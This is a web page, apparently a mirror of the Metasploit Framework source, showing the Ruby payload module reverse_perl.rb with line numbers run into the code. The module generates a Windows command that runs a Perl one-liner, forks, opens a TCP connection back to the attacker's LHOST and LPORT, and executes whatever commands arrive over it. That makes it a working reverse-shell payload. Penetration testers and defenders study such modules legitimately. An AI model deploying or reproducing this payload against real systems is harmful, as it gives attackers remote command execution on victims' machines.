Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/payloads/singles/cmd/windows/reverse_perl.rb
Views: 11780
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##456module MetasploitModule78CachedSize = 148910include Msf::Payload::Single11include Msf::Sessions::CommandShellOptions1213def initialize(info = {})14super(merge_info(info,15'Name' => 'Windows Command, Double Reverse TCP Connection (via Perl)',16'Description' => 'Creates an interactive shell via perl',17'Author' => ['cazz', 'aushack'],18'License' => BSD_LICENSE,19'Platform' => 'win',20'Arch' => ARCH_CMD,21'Handler' => Msf::Handler::ReverseTcp,22'Session' => Msf::Sessions::CommandShell,23'PayloadType' => 'cmd',24'RequiredCmd' => 'perl',25'Payload' =>26{27'Offsets' => { },28'Payload' => ''29}30))31register_advanced_options(32[33OptString.new('PerlPath', [true, 'The path to the Perl executable', 'perl'])34]35)36end3738#39# Constructs the payload40#41def generate(_opts = {})42return super + command_string43end4445#46# Returns the command string to use for execution47#48def command_string49lhost = datastore['LHOST']50ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""51lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)52cmd = %{#{datastore['PerlPath']} -MIO -e "$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\\"#{lhost}:#{datastore['LPORT']}\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;"}53end54end555657